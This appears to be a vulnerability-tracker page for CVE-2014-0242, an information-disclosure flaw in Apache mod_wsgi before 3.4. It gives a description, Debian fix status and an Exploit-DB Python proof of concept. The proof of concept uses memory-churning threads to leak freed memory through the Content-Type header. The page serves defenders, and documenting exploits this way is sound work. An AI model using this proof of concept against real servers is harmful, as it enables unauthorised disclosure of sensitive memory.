CVE-2014-0242

unknown

Published — · Modified —

💬 Discuss on Community ✚ Propose mitigation

CVSS v3

—

CVSS v4 NEW

—

not yet in upstream

VIR risk

1.0

Description

mod_wsgi module before 3.4 for Apache, when used in embedded mode, might allow remote attackers to obtain sensitive information via the Content-Type header which is generated from memory that may have been freed and then overwritten by a separate thread.

Predictions

Exploit likelihood

20%

Patch ETA

—

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or — if you've already worked around this in production — publish your fix to the community-verified tier.

✚ Propose a mitigation on Community → Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-39196 remote linux verified python · 1 KB

Buck Golemon · 2014-05-21

Apache mod_wsgi - Information Disclosure

python exploit Source: Exploit-DB

source: https://www.securityfocus.com/bid/67534/info

mod_wsgi is prone to a remote information-disclosure vulnerability.

Attackers can exploit this issue to obtain sensitive information that may aid in launching further attacks. 

import functools
 
import threading
import time
import random
 
def run(*args):
    while True:
        items = []
        for i in range(1000):
            items.append((int(random.random()*20)*'X'))
        time.sleep(0.00001)
 
thread = threading.Thread(target=run)
thread.start()
 
def headers():
    return [('Content-Type', 'text/plain'.upper().lower())]
 
def response():
    yield 'Hello World!\n'
 
_content_type_cache = {}
 
def intern_content_type(application):
    @functools.wraps(application)
    def _wrapper(environ, start_response):
        def _start_response(status, headers, *args):
            _headers = []
            for header, value in headers:
                if header.lower() == 'content-type':
                    value = _content_type_cache.setdefault(value, value)
                _headers.append((header, value))
            return start_response(status, _headers, *args)
        return application(environ, _start_response)
    return _wrapper
 
#@intern_content_type
def application(environ, start_response):
    status = '200 OK'
 
    start_response(status, headers())
    return response()

OS impact

Debian Fixed 5 releases

Version	Status	Fixed in
trixie	Fixed	`3.4-3`
sid	Fixed	`3.4-3`
forky	Fixed	`3.4-3`
bullseye	Fixed	`3.4-3`
bookworm	Fixed	`3.4-3`

References

https://security-tracker.debian.org/tracker/CVE-2014-0242

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.